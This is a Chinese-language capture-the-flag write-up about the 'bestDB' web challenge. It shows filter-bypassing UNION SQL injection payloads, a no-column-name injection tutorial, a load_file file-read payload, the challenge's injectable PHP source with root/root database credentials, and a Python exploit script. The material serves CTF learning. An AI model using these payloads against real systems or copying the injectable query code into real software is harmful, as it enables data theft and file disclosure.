<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#000000"><meta name="author" content="gyy"><meta name="copyright" content="gyy"><meta name="generator" content="Hexo 5.2.0"><meta name="theme" content="hexo-theme-yun"><title>DASCTF三月赛 | Err0r</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.22/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_ed8vp4atwoj.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => <!-- hexo-inject:begin --><!-- hexo-inject:end -->{
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link id="light-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism.css" media="(prefers-color-scheme: light)"><link id="dark-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism-tomorrow.css" media="(prefers-color-scheme: dark)"><link rel="shortcut icon" type="image/svg+xml" href="/favicon.ico"><link rel="mask-icon" href="/favicon.ico" color="#000000"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"err0r.top","root":"/","title":"浅伴独蓝的小站","version":"1.5.1","mode":"time","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"想要搜些什么？","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"local_search":{"path":"/search.xml"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/utils.js"></script><script src="/js/hexo-theme-yun.js"></script><link rel="alternate" href="/atom.xml" title="Err0r" type="application/atom+xml"><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><meta name="description" content="队伍名称：err0rcm">
<meta property="og:type" content="article">
<meta property="og:title" content="DASCTF三月赛">
<meta property="og:url" content="https://err0r.top/article/mardasctf/index.html">
<meta property="og:site_name" content="Err0r">
<meta property="og:description" content="队伍名称：err0rcm">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://err0r.top/article/mardasctf/image-20210329193545757.png">
<meta property="og:image" content="https://err0r.top/article/mardasctf/image-20210329195606802.png">
<meta property="og:image" content="https://err0r.top/article/mardasctf/image-20210329195833956.png">
<meta property="og:image" content="https://err0r.top/article/mardasctf/image-20210329200819627.png">
<meta property="og:image" content="https://err0r.top/article/mardasctf/image-20210329201418814.png">
<meta property="og:image" content="https://err0r.top/article/mardasctf/image-20210329202408382.png">
<meta property="article:published_time" content="2021-03-29T11:17:53.000Z">
<meta property="article:modified_time" content="2021-03-30T11:56:43.003Z">
<meta property="article:author" content="gyy">
<meta property="article:tag" content="SQL">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://err0r.top/article/mardasctf/image-20210329193545757.png"><script src="/js/ui/mode.js"></script><!-- hexo-inject:begin --><!-- hexo-inject:end --></head><body><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="gyy"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="gyy"></a><div class="site-author-name"><a href="/about/">gyy</a></div><a class="site-name" href="/about/site.html">Err0r</a><sub class="site-subtitle">gyy</sub><div class="site-desciption">gugugu</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">25</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">5</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">9</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" title="QQ MTkwNjk2ODc2NA==" target="_blank" style="color:#12B7F5"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/Err0rCM" title="GitHub" target="_blank" style="color:#6e5494"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://space.bilibili.com/8408670" title="哔哩哔哩" target="_blank" style="color:#FF8EB3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-bilibili-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:err0rcm@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="/atom.xml" title="RSS" target="_blank" style="color:orange"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-rss-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://travellings.now.sh/" title="Travelling" target="_blank" style="color:var(--hty-text-color)"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-send-plane-2-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们|友情链接" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-open-arm-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB"><span class="toc-number">1.</span> <span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#bestDB"><span class="toc-number">1.1.</span> <span class="toc-text">bestDB</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%97%A0%E5%88%97%E5%90%8D%E6%9F%A5%E8%AF%A2"><span class="toc-number">1.1.1.</span> <span class="toc-text">无列名查询</span></a></li></ol></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://err0r.top/article/mardasctf/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="gyy"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Err0r"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">DASCTF三月赛</h1><div class="post-meta"><div class="post-time" style="display:block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <time title="创建时间：2021-03-29 19:17:53" itemprop="dateCreated datePublished" datetime="2021-03-29T19:17:53+08:00">2021-03-29</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-2-line"></use></svg></span> <time title="修改时间：2021-03-30 19:56:43" itemprop="dateModified" datetime="2021-03-30T19:56:43+08:00">2021-03-30</time></div><span class="post-count"><span class="post-symbolcount"><span class="post-meta-item-icon" title="本文字数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-file-word-line"></use></svg></span> <span title="本文字数">1.7k</span><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读时长"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-timer-line"></use></svg></span> <span title="阅读时长">8m</span></span></span><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span id="busuanzi_value_page_pv"></span></span></span><span class="post-meta-divider">-</span><a href="#comment"><span class="post-meta-item-icon" title="评论数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-chat-3-line"></use></svg> <span class="waline-comment-count" id="/article/mardasctf/"></span></span></a><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-line"></use></svg></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category" href="/categories/Write-Up/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">Write-Up</span></a></span></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#000000;"><p>队伍名称：err0rcm</p>
<!-- hexo-inject:begin --><!-- hexo-inject:end --><a id="more"></a>

<p>我是菜鸡，每次比赛都缺点灵性。</p>
<p>就做出来一题，当然准确来说也不算做出来，倒在了最后一步。反思…</p>
<p>本人比较菜，详细写一下，给自己好好总结</p>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="bestDB"><a href="#bestDB" class="headerlink" title="bestDB"></a>bestDB</h3><blockquote>
<p>由于电脑崩了:(  bp和网页都没了，只能凭我写了</p>
</blockquote>
<p>进去一个查询框，题目名字有db，肯定是注入了。</p>
<p>注释中发现hint</p>
<pre class="language-html" data-language="html"><code class="language-html">&lt;!-- SELECT * FROM users WHERE id = '$query' OR username = \"$query\" --!></code></pre>

<p>这就建个数据库测试，经测试发现ban了空格和单引号，测试出了payload</p>
<p><code>-1&quot;union/**/select/**/1,2,3&quot;</code></p>
<img src="/article/mardasctf/image-20210329193545757.png" class="" title="union" loading="lazy">

<p>回显位为1和2，改改以前的脚本，查数据库名</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token operator">-</span><span class="token number">1</span><span class="token string">"union/**/select/**/1,database(),3"</span>

<span class="token comment"># databases==========>users</span></code></pre>

<p>查表名</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token operator">-</span><span class="token number">1</span><span class="token string">"union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()),3"</span>

<span class="token comment"># tables==========>f1agdas,users</span></code></pre>

<p>无列名查询(其实直接查就好，本人复习一下之前的知识)</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token operator">-</span><span class="token number">1</span><span class="token string">"union/**/select/**/1,(select/**/`2`/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/f1agdas/**/limit/**/1,1)a),3"</span>


<span class="token comment"># data==========>flag.txt</span></code></pre>



<hr>
<h4 id="无列名查询"><a href="#无列名查询" class="headerlink" title="无列名查询"></a>无列名查询</h4><p>例如join进行无列名注入，现在有张表<code>table</code>如下</p>
<table>
<thead>
<tr>
<th>id</th>
<th>username</th>
<th>password</th>
<th>question</th>
<th>token</th>
</tr>
</thead>
<tbody><tr>
<td>1</td>
<td>1a</td>
<td>1b</td>
<td>1c</td>
<td>1d</td>
</tr>
<tr>
<td>2</td>
<td>2a</td>
<td>2b</td>
<td>2c</td>
<td>2d</td>
</tr>
<tr>
<td>3</td>
<td>3a</td>
<td>3b</td>
<td>3c</td>
<td>3d</td>
</tr>
</tbody></table>
<p>正常<strong>在数据库查询</strong>，表名需带反引号，在php端中<strong>并不需要</strong></p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token keyword">table</span><span class="token punctuation">;</span></code></pre>

<img src="/article/mardasctf/image-20210329195606802.png" class="" title="table" loading="lazy">

<p>假设不知道列名，通过union查询，需猜测列数，这里为5列</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token number">5</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token keyword">table</span><span class="token punctuation">;</span></code></pre>

<img src="/article/mardasctf/image-20210329195833956.png" class="" title="union" loading="lazy">

<p>如图所示，列名被替换成了数字，</p>
<table>
<thead>
<tr>
<th>1（派生表列1）</th>
<th>2（派生表列2）</th>
<th>3（派生表列3）</th>
<th>4（派生表列4）</th>
<th>5（派生表列5）</th>
</tr>
</thead>
<tbody><tr>
<td>1（原id）</td>
<td>2（原username）</td>
<td>3（原password）</td>
<td>4（原question）</td>
<td>5（原token）</td>
</tr>
<tr>
<td>1</td>
<td>1a</td>
<td>1b</td>
<td>1c</td>
<td>1d</td>
</tr>
<tr>
<td>2</td>
<td>2a</td>
<td>2b</td>
<td>2c</td>
<td>2d</td>
</tr>
<tr>
<td>3</td>
<td>3a</td>
<td>3b</td>
<td>3c</td>
<td>3d</td>
</tr>
</tbody></table>
<p>我们可以进一步用数字来对应列查询</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token punctuation">`</span><span class="token number">2</span><span class="token punctuation">`</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token number">5</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token keyword">table</span><span class="token punctuation">)</span>a<span class="token punctuation">;</span></code></pre>

<img src="/article/mardasctf/image-20210329200819627.png" class="" title="union2" loading="lazy">

<p>如果反引号被过滤，同样继续用别名代替</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">select</span> c <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span> <span class="token keyword">as</span> b<span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span> <span class="token keyword">as</span> c<span class="token punctuation">,</span><span class="token number">5</span> <span class="token keyword">as</span> d <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token keyword">table</span><span class="token punctuation">)</span>a<span class="token punctuation">;</span></code></pre>

<img src="/article/mardasctf/image-20210329201418814.png" class="" title="别名" loading="lazy">

<p>此时派生表如下</p>
<table>
<thead>
<tr>
<th>1（派生表列1）</th>
<th>b（原派生表列2）</th>
<th>3（派生表列3）</th>
<th>c（原派生表列4）</th>
<th>d（派生表列5）</th>
</tr>
</thead>
<tbody><tr>
<td>1（原id）</td>
<td>2（原username）</td>
<td>3（原password）</td>
<td>4（原question）</td>
<td>5（原token）</td>
</tr>
<tr>
<td>1</td>
<td>1a</td>
<td>1b</td>
<td>1c</td>
<td>1d</td>
</tr>
<tr>
<td>2</td>
<td>2a</td>
<td>2b</td>
<td>2c</td>
<td>2d</td>
</tr>
<tr>
<td>3</td>
<td>3a</td>
<td>3b</td>
<td>3c</td>
<td>3d</td>
</tr>
</tbody></table>
<p>同时查询多个列</p>
<pre class="language-none"><code class="language-none">select concat(b,0x2d,c) from (select 1,2 as b,3 as c,4,5 union select * from &#96;table&#96;)a;</code></pre>

<p><code>0x2d</code>为<code>-</code></p>
<img src="/article/mardasctf/image-20210329202408382.png" class="" title="concat" loading="lazy">

<hr>
<p>回到正题，查到<code>f1agdas</code>表里有个<code>flag.txt</code>，应该是利用<code>load_file()</code>函数读取文件，查了下用户</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token operator">-</span><span class="token number">1</span><span class="token string">"union/**/select/**/1,user(),3"</span>

<span class="token comment"># user==========>'root'@'localhost'</span></code></pre>

<p>肯定有权限了，读了<code>index.php</code>和<code>dbConnect.php</code>，给复现的师傅参考</p>
<pre class="language-php" data-language="php"><code class="language-php">// index.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
    <span class="token function">error_reporting</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">include</span> <span class="token single-quoted-string string">'dbConnect.php'</span><span class="token punctuation">;</span>
    <span class="token variable">$query</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'query'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token variable">$blacklist</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token single-quoted-string string">' '</span><span class="token punctuation">,</span> <span class="token single-quoted-string string">'\''</span><span class="token punctuation">,</span> <span class="token single-quoted-string string">'flag'</span><span class="token punctuation">,</span> <span class="token single-quoted-string string">'delete'</span><span class="token punctuation">,</span> <span class="token single-quoted-string string">'drop'</span><span class="token punctuation">,</span> <span class="token single-quoted-string string">'update'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">foreach</span> <span class="token punctuation">(</span><span class="token variable">$blacklist</span> <span class="token keyword">as</span> <span class="token variable">$item</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"/"</span><span class="token punctuation">.</span><span class="token variable">$item</span><span class="token punctuation">.</span><span class="token double-quoted-string string">"/i"</span><span class="token punctuation">,</span> <span class="token variable">$query</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
            <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'Forbidden!!!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'query'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token variable">$sql</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"SELECT * FROM users WHERE id = '<span class="token interpolation"><span class="token variable">$query</span></span>' OR username = \"<span class="token interpolation"><span class="token variable">$query</span></span>\""</span><span class="token punctuation">;</span>
        <span class="token variable">$result</span> <span class="token operator">=</span> <span class="token variable">$mysqli</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">query</span><span class="token punctuation">(</span><span class="token variable">$sql</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$data</span> <span class="token operator">=</span> <span class="token variable">$result</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">fetch_all</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">echo</span> <span class="token double-quoted-string string">"&lt;table border='1' width='600px' cellpadding='0' cellspacing='0'  align='center' style='margin-top: 20px; margin-left: 33%'>&lt;tr>&lt;th>ID&lt;/th>&lt;th>UserName&lt;/th>&lt;/tr>"</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">empty</span><span class="token punctuation">(</span><span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token keyword">foreach</span> <span class="token punctuation">(</span><span class="token variable">$data</span> <span class="token keyword">as</span> <span class="token variable">$k</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
                <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">empty</span><span class="token punctuation">(</span><span class="token variable">$k</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>

                <span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
                    <span class="token keyword">echo</span> <span class="token double-quoted-string string">"&lt;tr>&lt;td><span class="token interpolation"><span class="token punctuation">&#123;</span><span class="token variable">$k</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">&#125;</span></span>&lt;/td>&lt;td><span class="token interpolation"><span class="token punctuation">&#123;</span><span class="token variable">$k</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">&#125;</span></span>&lt;/td>&lt;/tr>"</span><span class="token punctuation">;</span>
                <span class="token punctuation">&#125;</span>
            <span class="token punctuation">&#125;</span>
        <span class="token punctuation">&#125;</span>
        <span class="token keyword">echo</span> <span class="token double-quoted-string string">"&lt;/table>"</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span></code></pre>

<pre class="language-php" data-language="php"><code class="language-php">// dbConnect.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$serve</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'127.0.0.1'</span><span class="token punctuation">;</span>
<span class="token variable">$username</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'root'</span><span class="token punctuation">;</span>
<span class="token variable">$password</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'root'</span><span class="token punctuation">;</span>
<span class="token variable">$dbname</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'users'</span><span class="token punctuation">;</span>
<span class="token variable">$mysqli</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Mysqli</span><span class="token punctuation">(</span><span class="token variable">$serve</span><span class="token punctuation">,</span><span class="token variable">$username</span><span class="token punctuation">,</span><span class="token variable">$password</span><span class="token punctuation">,</span><span class="token variable">$dbname</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$mysqli</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">connect_error</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'connect error:'</span><span class="token punctuation">.</span><span class="token variable">$mysqli</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">connect_errno</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token variable">$mysqli</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">set_charset</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'UTF-8'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// 设置数据库字符集</span></span></code></pre>

<p>读取根目录下flag，由于ban了<code>flag</code>，转十六进制即可</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token operator">-</span><span class="token number">1</span><span class="token string">"union/**/select/**/1,hex(load_file(0x2f666c6167)),3"</span></code></pre>

<p><code>hex(&#39;/flag&#39;)==&#39;0x2f666c6167&#39;</code></p>
<p>结束了</p>
<p>附上小脚本，虽然没啥用</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token triple-quoted-string string">"""
-*- coding: utf-8 -*-
@File: exp.py
@Author: gyy
@Time: 3月 27, 2021
"""</span>
<span class="token keyword">import</span> requests
<span class="token keyword">import</span> time


url <span class="token operator">=</span> <span class="token string">"http://ea4d13de-db0a-41e5-b303-a843bd51a27b.machine.dasctf.com/?query="</span>

<span class="token keyword">def</span> <span class="token function">req</span><span class="token punctuation">(</span>payload<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
    res <span class="token operator">=</span> requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url<span class="token operator">+</span>payload<span class="token punctuation">)</span><span class="token punctuation">.</span>content<span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span>
    <span class="token keyword">if</span> <span class="token string">"Forbidden"</span> <span class="token keyword">in</span> res<span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token string">"Forbidden"</span>
    <span class="token keyword">else</span><span class="token punctuation">:</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>
            <span class="token keyword">return</span> res<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">"&lt;table border='1' width='600px' cellpadding='0' cellspacing='0'  align='center' style='margin-top: 20px; margin-left: 33%'>"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span>
        <span class="token keyword">except</span><span class="token punctuation">:</span>
            <span class="token keyword">return</span> <span class="token string">"right"</span>


<span class="token keyword">def</span> <span class="token function">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    payload <span class="token operator">=</span> <span class="token string">"-1\"union select 1,database(),3\""</span><span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">" "</span><span class="token punctuation">,</span> <span class="token string">"/**/"</span><span class="token punctuation">)</span>
    res <span class="token operator">=</span> req<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>res<span class="token punctuation">)</span>
<span class="token comment"># databases==========>users</span>

<span class="token keyword">def</span> <span class="token function">table</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    payload <span class="token operator">=</span> <span class="token string">"-1\"union select 1,(select group_concat(table_name) from information_schema.tables where table_schema like database()),3\""</span><span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">" "</span><span class="token punctuation">,</span> <span class="token string">"/**/"</span><span class="token punctuation">)</span>
    res <span class="token operator">=</span> req<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>res<span class="token punctuation">)</span>
<span class="token comment"># tables==========>f1agdas,users</span>

<span class="token keyword">def</span> <span class="token function">columns</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    payload <span class="token operator">=</span> <span class="token string">"-1\"union select 1,(select `2` from (select 1,2 union select * from f1agdas limit 1,1)a),3\""</span><span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">" "</span><span class="token punctuation">,</span> <span class="token string">"/**/"</span><span class="token punctuation">)</span>
    res <span class="token operator">=</span> req<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>res<span class="token punctuation">)</span>
<span class="token comment"># flag.columns==========>flag.txt</span>

<span class="token keyword">def</span> <span class="token function">data</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    payload <span class="token operator">=</span> <span class="token string">"-1\"union select 1,hex(load_file(0x2f666c6167)),3\""</span><span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">" "</span><span class="token punctuation">,</span> <span class="token string">"/**/"</span><span class="token punctuation">)</span>
    res <span class="token operator">=</span> req<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>res<span class="token punctuation">)</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span>
    <span class="token comment"># database()</span>
    <span class="token comment"># table()</span>
    <span class="token comment"># columns()</span>
    data<span class="token punctuation">(</span><span class="token punctuation">)</span></code></pre>



<hr>
<p>以下是本人的碎碎念和反思，师傅们可以跳过惹</p>
<p>经验不足，最后还是没能出这简单题。一方面也是平台的问题，实在太卡了:(</p>
